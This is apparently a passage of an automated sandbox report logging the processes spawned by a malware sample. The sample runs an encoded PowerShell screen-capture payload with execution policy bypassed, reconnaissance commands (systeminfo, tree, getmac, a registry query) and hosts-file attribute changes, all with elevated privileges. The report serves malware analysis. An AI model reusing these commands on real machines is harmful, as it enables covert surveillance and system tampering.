                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                                                                                                                                                                                            Imagebase:0x7ff772ad0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:64
                                                                                                                                                                                                                            Start time:02:38:12
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:65
                                                                                                                                                                                                                            Start time:02:38:13
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\systeminfo.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:systeminfo
                                                                                                                                                                                                                            Imagebase:0x7ff6e4720000
                                                                                                                                                                                                                            File size:110'080 bytes
                                                                                                                                                                                                                            MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:66
                                                                                                                                                                                                                            Start time:02:38:13
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:tree /A /F
                                                                                                                                                                                                                            Imagebase:0x7ff6a1c50000
                                                                                                                                                                                                                            File size:20'992 bytes
                                                                                                                                                                                                                            MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:67
                                                                                                                                                                                                                            Start time:02:38:13
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                                                                                                                                                                                                                            Imagebase:0x7ff6f3ac0000
                                                                                                                                                                                                                            File size:77'312 bytes
                                                                                                                                                                                                                            MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:68
                                                                                                                                                                                                                            Start time:02:38:13
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                                                                                                                                                                            Imagebase:0x7ff6eb350000
                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:69
                                                                                                                                                                                                                            Start time:02:38:15
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vebzhwcp\vebzhwcp.cmdline"
                                                                                                                                                                                                                            Imagebase:0x7ff78ab90000
                                                                                                                                                                                                                            File size:2'759'232 bytes
                                                                                                                                                                                                                            MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:70
                                                                                                                                                                                                                            Start time:02:38:15
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                                                                                                                                                                                                            Imagebase:0x7ff772ad0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:71
                                                                                                                                                                                                                            Start time:02:38:15
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "getmac"
                                                                                                                                                                                                                            Imagebase:0x7ff772ad0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:72
                                                                                                                                                                                                                            Start time:02:38:15
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                            Imagebase:0x7ff772ad0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:73
                                                                                                                                                                                                                            Start time:02:38:15
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:74
                                                                                                                                                                                                                            Start time:02:38:15
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:75
                                                                                                                                                                                                                            Start time:02:38:15
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:76
                                                                                                                                                                                                                            Start time:02:38:15
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA7D9.tmp" "c:\Users\user\AppData\Local\Temp\vebzhwcp\CSCD4517BE1E6C4428293E27562A6116680.TMP"
                                                                                                                                                                                                                            Imagebase:0x7ff6b2650000
                                                                                                                                                                                                                            File size:52'744 bytes
                                                                                                                                                                                                                            MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:77
                                                                                                                                                                                                                            Start time:02:38:15
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:attrib -r C:\Windows\System32\drivers\etc\hosts
                                                                                                                                                                                                                            Imagebase:0x7ff7451f0000
                                                                                                                                                                                                                            File size:23'040 bytes
                                                                                                                                                                                                                            MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:78
                                                                                                                                                                                                                            Start time:02:38:15
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:tree /A /F
                                                                                                                                                                                                                            Imagebase:0x7ff6a1c50000
                                                                                                                                                                                                                            File size:20'992 bytes
                                                                                                                                                                                                                            MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:79
                                                                                                                                                                                                                            Start time:02:38:15
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\getmac.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:getmac
                                                                                                                                                                                                                            Imagebase:0x7ff696200000
                                                                                                                                                                                                                            File size:90'112 bytes
                                                                                                                                                                                                                            MD5 hash:7D4B72DFF5B8E98DD1351A401E402C33
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:80
                                                                                                                                                                                                                            Start time:02:38:17
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                                                                                                                                                                                                            Imagebase:0x7ff772ad0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:81
                                                                                                                                                                                                                            Start time:02:38:17
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                            Imagebase:0x7ff772ad0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:82
                                                                                                                                                                                                                            Start time:02:38:17
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:83
                                                                                                                                                                                                                            Start time:02:38:17
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:84
                                                                                                                                                                                                                            Start time:02:38:17
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:tree /A /F
                                                                                                                                                                                                                            Imagebase:0x7ff6a1c50000
                                                                                                                                                                                                                            File size:20'992 bytes
                                                                                                                                                                                                                            MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

